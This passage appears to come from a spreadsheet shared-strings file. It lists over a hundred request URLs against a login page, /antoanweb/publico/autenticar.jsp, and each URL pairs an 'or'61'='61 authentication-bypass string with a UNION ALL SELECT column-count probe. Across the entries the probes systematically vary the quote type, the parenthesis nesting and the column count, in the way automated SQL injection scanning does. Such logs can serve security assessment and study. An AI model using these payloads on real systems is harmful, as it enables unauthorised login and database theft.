    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492#and('vxgm'='vxgm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3684,3684,3684,3684,3684,3684,3684,3684,3684,3684,3684#and(('xuin'='xuin&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475#and(('hyjk'='hyjk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect6781,6781,6781,6781,6781,6781,6781,6781,6781,6781,6781,6781,6781#and(('mwet'='mwet&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect1272,1272,1272,1272,1272,1272,1272,1272,1272,1272,1272,1272,1272,1272#and(('mtus'='mtus&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3029,3029,3029,3029,3029,3029,3029,3029,3029,3029,3029,3029,3029,3029,3029#and(('bqad'='bqad&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect9980,9980,9980,9980,9980,9980,9980,9980,9980,9980,9980,9980,9980,9980,9980,9980#and(('ffra'='ffra&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect4202,4202,4202,4202,4202,4202,4202,4202,4202,4202,4202,4202,4202,4202,4202,4202,4202#and(('lxhv'='lxhv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654#and(('nuug'='nuug&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3941,3941,3941,3941,3941,3941,3941,3941,3941,3941,3941,3941,3941,3941,3941,3941,3941,3941,3941#and(('kphc'='kphc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742#and(('ocgh'='ocgh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect5295,5295,5295,5295,5295,5295,5295,5295,5295,5295,5295#and((('rixw'='rixw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect8603,8603,8603,8603,8603,8603,8603,8603,8603,8603,8603,8603#and((('ajmb'='ajmb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect8721,8721,8721,8721,8721,8721,8721,8721,8721,8721,8721,8721,8721#and((('qyqy'='qyqy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect1344,1344,1344,1344,1344,1344,1344,1344,1344,1344,1344,1344,1344,1344#and((('icgj'='icgj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486#and((('manh'='manh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect9296,9296,9296,9296,9296,9296,9296,9296,9296,9296,9296,9296,9296,9296,9296,9296#and((('kbaf'='kbaf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect4128,4128,4128,4128,4128,4128,4128,4128,4128,4128,4128,4128,4128,4128,4128,4128,4128#and((('cfmu'='cfmu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect2318,2318,2318,2318,2318,2318,2318,2318,2318,2318,2318,2318,2318,2318,2318,2318,2318,2318#and((('afsn'='afsn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect4125,4125,4125,4125,4125,4125,4125,4125,4125,4125,4125,4125,4125,4125,4125,4125,4125,4125,4125#and((('vapm'='vapm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect5267,5267,5267,5267,5267,5267,5267,5267,5267,5267,5267,5267,5267,5267,5267,5267,5267,5267,5267,5267#and((('xqvt'='xqvt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect7320,7320,7320,7320,7320,7320,7320,7320,7320,7320,7320#and'yzvc'='yzvc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect1751,1751,1751,1751,1751,1751,1751,1751,1751,1751,1751,1751#and'egfy'='egfy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4487,4487,4487,4487,4487,4487,4487,4487,4487,4487,4487,4487,4487#and'eqkn'='eqkn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945#and'fohb'='fohb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4103,4103,4103,4103,4103,4103,4103,4103,4103,4103,4103,4103,4103,4103,4103#and'sqzu'='sqzu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4098,4098,4098,4098,4098,4098,4098,4098,4098,4098,4098,4098,4098,4098,4098,4098#and'ciuz'='ciuz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4678,4678,4678,4678,4678,4678,4678,4678,4678,4678,4678,4678,4678,4678,4678,4678,4678#and'wcei'='wcei&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3528,3528,3528,3528,3528,3528,3528,3528,3528,3528,3528,3528,3528,3528,3528,3528,3528,3528#and'yjfm'='yjfm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8572,8572,8572,8572,8572,8572,8572,8572,8572,8572,8572,8572,8572,8572,8572,8572,8572,8572,8572#and'xktd'='xktd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect7562,7562,7562,7562,7562,7562,7562,7562,7562,7562,7562,7562,7562,7562,7562,7562,7562,7562,7562,7562#and'kkol'='kkol&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3099,3099,3099,3099,3099,3099,3099,3099,3099,3099,3099#and('tgpr'like'tgpr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263#and('vaas'like'vaas&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect5987,5987,5987,5987,5987,5987,5987,5987,5987,5987,5987,5987,5987#and('kwru'like'kwru&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect8696,8696,8696,8696,8696,8696,8696,8696,8696,8696,8696,8696,8696,8696#and('llqj'like'llqj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426,1426#and('sdlw'like'sdlw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6069,6069,6069,6069,6069,6069,6069,6069,6069,6069,6069,6069,6069,6069,6069,6069#and('ffde'like'ffde&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293#and('rkku'like'rkku&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357#and('zrmr'like'zrmr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect1320,1320,1320,1320,1320,1320,1320,1320,1320,1320,1320,1320,1320,1320,1320,1320,1320,1320,1320#and('pofy'like'pofy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect8366,8366,8366,8366,8366,8366,8366,8366,8366,8366,8366,8366,8366,8366,8366,8366,8366,8366,8366,8366#and('ofkh'like'ofkh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3481,3481,3481,3481,3481,3481,3481,3481,3481,3481,3481#and(('lznh'like'lznh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect2014,2014,2014,2014,2014,2014,2014,2014,2014,2014,2014,2014#and(('fatw'like'fatw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect8203,8203,8203,8203,8203,8203,8203,8203,8203,8203,8203,8203,8203#and(('ewxd'like'ewxd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect8972,8972,8972,8972,8972,8972,8972,8972,8972,8972,8972,8972,8972,8972#and(('bdeg'like'bdeg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect9986,9986,9986,9986,9986,9986,9986,9986,9986,9986,9986,9986,9986,9986,9986#and(('xcto'like'xcto&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect8739,8739,8739,8739,8739,8739,8739,8739,8739,8739,8739,8739,8739,8739,8739,8739#and(('klqp'like'klqp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect8674,8674,8674,8674,8674,8674,8674,8674,8674,8674,8674,8674,8674,8674,8674,8674,8674#and(('rclp'like'rclp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect6353,6353,6353,6353,6353,6353,6353,6353,6353,6353,6353,6353,6353,6353,6353,6353,6353,6353#and(('fbrw'like'fbrw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811#and(('tfae'like'tfae&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect8078,8078,8078,8078,8078,8078,8078,8078,8078,8078,8078,8078,8078,8078,8078,8078,8078,8078,8078,8078#and(('gnmk'like'gnmk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect1105,1105,1105,1105,1105,1105,1105,1105,1105,1105,1105#and((('iosh'like'iosh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect819,819,819,819,819,819,819,819,819,819,819,819#and((('cvgl'like'cvgl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect6555,6555,6555,6555,6555,6555,6555,6555,6555,6555,6555,6555,6555#and((('mlkp'like'mlkp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect8627,8627,8627,8627,8627,8627,8627,8627,8627,8627,8627,8627,8627,8627#and((('xzwd'like'xzwd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect6389,6389,6389,6389,6389,6389,6389,6389,6389,6389,6389,6389,6389,6389,6389#and((('ezpl'like'ezpl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect5501,5501,5501,5501,5501,5501,5501,5501,5501,5501,5501,5501,5501,5501,5501,5501#and((('kisp'like'kisp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect6565,6565,6565,6565,6565,6565,6565,6565,6565,6565,6565,6565,6565,6565,6565,6565,6565#and((('aawo'like'aawo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect8281,8281,8281,8281,8281,8281,8281,8281,8281,8281,8281,8281,8281,8281,8281,8281,8281,8281#and((('argm'like'argm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect2406,2406,2406,2406,2406,2406,2406,2406,2406,2406,2406,2406,2406,2406,2406,2406,2406,2406,2406#and((('xgeu'like'xgeu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect578,578,578,578,578,578,578,578,578,578,578,578,578,578,578,578,578,578,578,578#and((('dzbt'like'dzbt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect5620,5620,5620,5620,5620,5620,5620,5620,5620,5620,5620#and'vamy'like'vamy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect7033,7033,7033,7033,7033,7033,7033,7033,7033,7033,7033,7033#and'piff'like'piff&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501#and'tuyc'like'tuyc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4916,4916,4916,4916,4916,4916,4916,4916,4916,4916,4916,4916,4916,4916#and'itny'like'itny&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3425,3425,3425,3425,3425,3425,3425,3425,3425,3425,3425,3425,3425,3425,3425#and'tgoq'like'tgoq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4144,4144,4144,4144,4144,4144,4144,4144,4144,4144,4144,4144,4144,4144,4144,4144#and'fnxd'like'fnxd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8656,8656,8656,8656,8656,8656,8656,8656,8656,8656,8656,8656,8656,8656,8656,8656,8656#and'biky'like'biky&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect7592,7592,7592,7592,7592,7592,7592,7592,7592,7592,7592,7592,7592,7592,7592,7592,7592,7592#and'jkfa'like'jkfa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect7331,7331,7331,7331,7331,7331,7331,7331,7331,7331,7331,7331,7331,7331,7331,7331,7331,7331,7331#and'cwka'like'cwka&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect549,549,549,549,549,549,549,549,549,549,549,549,549,549,549,549,549,549,549,549#and'zpzu'like'zpzu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect3994,3994,3994,3994,3994,3994,3994,3994,3994,3994,3994#and("nrjy"="nrjy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777#and("zdub"="zdub&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect3490,3490,3490,3490,3490,3490,3490,3490,3490,3490,3490,3490,3490#and("vhng"="vhng&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect7219,7219,7219,7219,7219,7219,7219,7219,7219,7219,7219,7219,7219,7219#and("oltb"="oltb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect5775,5775,5775,5775,5775,5775,5775,5775,5775,5775,5775,5775,5775,5775,5775#and("lfyz"="lfyz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect3304,3304,3304,3304,3304,3304,3304,3304,3304,3304,3304,3304,3304,3304,3304,3304#and("keam"="keam&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect9256,9256,9256,9256,9256,9256,9256,9256,9256,9256,9256,9256,9256,9256,9256,9256,9256#and("lrok"="lrok&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect7882,7882,7882,7882,7882,7882,7882,7882,7882,7882,7882,7882,7882,7882,7882,7882,7882,7882#and("opaj"="opaj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect8213,8213,8213,8213,8213,8213,8213,8213,8213,8213,8213,8213,8213,8213,8213,8213,8213,8213,8213#and("csqs"="csqs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672#and("fwpz"="fwpz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect7904,7904,7904,7904,7904,7904,7904,7904,7904,7904,7904#and(("onnq"="onnq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect8480,8480,8480,8480,8480,8480,8480,8480,8480,8480,8480,8480#and(("nycb"="nycb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect2018,2018,2018,2018,2018,2018,2018,2018,2018,2018,2018,2018,2018#and(("kkyg"="kkyg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442#and(("vahr"="vahr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect2039,2039,2039,2039,2039,2039,2039,2039,2039,2039,2039,2039,2039,2039,2039#and(("cgrk"="cgrk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect5039,5039,5039,5039,5039,5039,5039,5039,5039,5039,5039,5039,5039,5039,5039,5039#and(("djih"="djih&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect604,604,604,604,604,604,604,604,604,604,604,604,604,604,604,604,604#and(("wtas"="wtas&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect6080,6080,6080,6080,6080,6080,6080,6080,6080,6080,6080,6080,6080,6080,6080,6080,6080,6080#and(("socc"="socc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect9794,9794,9794,9794,9794,9794,9794,9794,9794,9794,9794,9794,9794,9794,9794,9794,9794,9794,9794#and(("ihdh"="ihdh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect1615,1615,1615,1615,1615,1615,1615,1615,1615,1615,1615,1615,1615,1615,1615,1615,1615,1615,1615,1615#and(("nijj"="nijj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect1284,1284,1284,1284,1284,1284,1284,1284,1284,1284,1284#and((("fatn"="fatn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect8594,8594,8594,8594,8594,8594,8594,8594,8594,8594,8594,8594#and((("upxy"="upxy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect595,595,595,595,595,595,595,595,595,595,595,595,595#and((("vyms"="vyms&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect5080,5080,5080,5080,5080,5080,5080,5080,5080,5080,5080,5080,5080,5080#and((("qmff"="qmff&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect8574,8574,8574,8574,8574,8574,8574,8574,8574,8574,8574,8574,8574,8574,8574#and((("mhqx"="mhqx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648#and((("ycap"="ycap&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect7938,7938,7938,7938,7938,7938,7938,7938,7938,7938,7938,7938,7938,7938,7938,7938,7938#and((("epjy"="epjy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect1541,1541,1541,1541,1541,1541,1541,1541,1541,1541,1541,1541,1541,1541,1541,1541,1541,1541#and((("kbrf"="kbrf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593#and((("bfmc"="bfmc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537#and((("ured"="ured&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9922,9922,9922,9922,9922,9922,9922,9922,9922,9922,9922#and"ritk"="ritk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570#and"amxy"="amxy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9257,9257,9257,9257,9257,9257,9257,9257,9257,9257,9257,9257,9257#and"bush"="bush&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect895,895,895,895,895,895,895,895,895,895,895,895,895,895#and"dqpm"="dqpm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect8387,8387,8387,8387,8387,8387,8387,8387,8387,8387,8387,8387,8387,8387,8387#and"cwis"="cwis&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3252,3252,3252,3252,3252,3252,3252,3252,3252,3252,3252,3252,3252,3252,3252,3252#and"yjio"="yjio&amp;modo=entrar</t>
  </si>
  <si>
